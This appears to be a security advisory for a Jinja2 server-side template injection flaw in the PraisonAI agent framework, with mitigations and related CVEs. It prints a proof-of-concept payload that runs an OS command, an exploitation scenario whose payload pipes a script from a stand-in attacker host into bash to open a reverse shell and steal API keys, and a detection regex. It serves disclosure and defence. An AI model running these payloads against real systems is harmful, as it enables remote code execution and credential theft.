PraisonAI contains a server-side template injection (SSTI) vulnerability where user-controlled input passed to agent.start() is rendered directly through Jinja2-style templates without sanitization, enabling arbitrary OS command execution on the host with the process's full privileges. With a CVSS of 8.8 (network-accessible, low privilege required, no user interaction), the blast radius covers any deployment where agent instructions are user-supplied — SaaS platforms, internal tooling, and agentic pipelines built on PraisonAI — and the framework's default auto-approval mode removes the human-in-the-loop safeguard that might otherwise block file operations. A working PoC using standard Jinja2 payloads is publicly documented in the advisory, making exploitation trivially reproducible without deep AI/ML expertise, and this package carries 9 other CVEs signaling persistent security debt. Patch immediately to praisonai>=4.5.115; if patching is delayed, disable approval_mode='auto', strip template syntax from user input, and isolate agent processes with minimal OS privileges.
Risk Assessment
High risk. CVSS 8.8 with low-privilege network access, no user interaction required, and a published PoC using standard Jinja2 SSTI payloads makes this trivially exploitable by any authenticated user. The auto-approval mode ('approval_mode=auto') eliminates the last procedural safeguard against unauthorized file operations. Any service exposing agent.start() to external input — directly or via API — is fully compromisable. Nine prior CVEs in the same package indicate a pattern of insufficient security review in this codebase, increasing confidence that additional attack surface exists.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| praisonai | pip | <= 4.5.114 | 4.5.115 |
Do you use praisonai? You're affected.
Severity & Risk
Recommended Action
- PATCH: Upgrade praisonai to version 4.5.115 immediately — this is the authoritative fix.
- WORKAROUND (if patching is delayed): Set approval_mode to manual/supervised to require human confirmation for all file operations; audit every call to agent.start() for unsanitized user input paths.
- INPUT SANITIZATION: Escape or strip Jinja2 template syntax characters ('{{', '}}', '{%', '%}') from user-supplied content before passing to any agent tool. Enable Jinja2 autoescape=True as defense-in-depth.
- SANDBOXING: Run PraisonAI agent processes in isolated containers with dropped capabilities (no network egress, read-only filesystem where possible, non-root UID).
- DETECTION: Alert on template expression patterns in agent inputs (regex: \{\{.*\}\}, __import__, os.system, subprocess); monitor for unexpected file creation in /tmp or world-writable directories; review process spawn logs for unusual child processes from the agent runtime.
Classification
Compliance Impact
This CVE is relevant to:
Technical Details
NVD Description
## Summary Direct insertion of unescaped user input into template-rendering tools allows arbitrary code execution via specially crafted agent instructions. ## Details The `create_agent_centric_tools()` function returns tools (like `acp_create_file`) that process file content using template rendering. When user input from `agent.start()` is passed directly into these tools without escaping (as shown in `agent_centric_example.py:85-86`), template expressions in the input are executed rather than treated as literal text. This occurs because: 1. No input sanitization or escaping is applied to user-controlled content 2. The ACP-enabled runtime auto-approves operations (`approval_mode="auto"`) 3. Tools lack context-aware escaping for template syntax ## PoC ```python # Replace the agent.start() call at line 85 with: result = agent.start('Create file with content: {{ self.__init__.__globals__.__builtins__.__import__("os").system("touch /tmp/pwned") }}') ``` Successful exploitation creates `/tmp/pwned` confirming arbitrary command execution. The expression `{{7*7}}` renders as `49` instead of literal text. ## Impact Attackers can execute arbitrary system commands with the privileges of the running process by injecting malicious template expressions through agent instructions. This compromises the host system, enabling data theft, ransomware deployment, or lateral movement. ## Recommended Fix 1. **Input Sanitization**: Implement strict whitelist validation for file content 2. **Contextual Escaping**: Auto-escape template syntax characters (e.g., `{{ }}`) in user input using Jinja2 `autoescape=True` 3. **Sandboxing**: Restrict template execution environments using secure eval modes 4. **Approval Hardening**: Require manual approval for file creation operations in production
Exploitation Scenario
An adversary with a low-privilege authenticated account on a platform using PraisonAI submits a crafted agent instruction: 'Create file with content: {{ self.__init__.__globals__.__builtins__.__import__("os").system("curl attacker.com/shell.sh | bash") }}'. The agent.start() call passes this string directly to acp_create_file without sanitization. The Jinja2 engine evaluates the embedded expression, executing the OS command with the web server process's privileges. With auto-approval mode active, no human review interrupts the chain. The attacker establishes a reverse shell, exfiltrates environment variables containing LLM provider API keys and database credentials, then pivots laterally into the internal AI infrastructure. The entire chain from injection to shell takes seconds and requires no specialized tooling.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H References
Timeline
Related Vulnerabilities
CVE-2026-39890 9.8 PraisonAI: YAML deserialization enables unauthenticated RCE
Same package: praisonai CVE-2026-39305 9.0 PraisonAI: path traversal enables arbitrary file write/RCE
Same package: praisonai CVE-2026-34955 8.8 PraisonAI: sandbox escape via shell=True blocklist bypass
Same package: praisonai CVE-2026-39307 8.1 PraisonAI: Zip Slip enables arbitrary file write / RCE
Same package: praisonai CVE-2026-34936 7.7 PraisonAI: SSRF via api_base steals cloud IAM credentials
Same package: praisonai
AI Threat Alert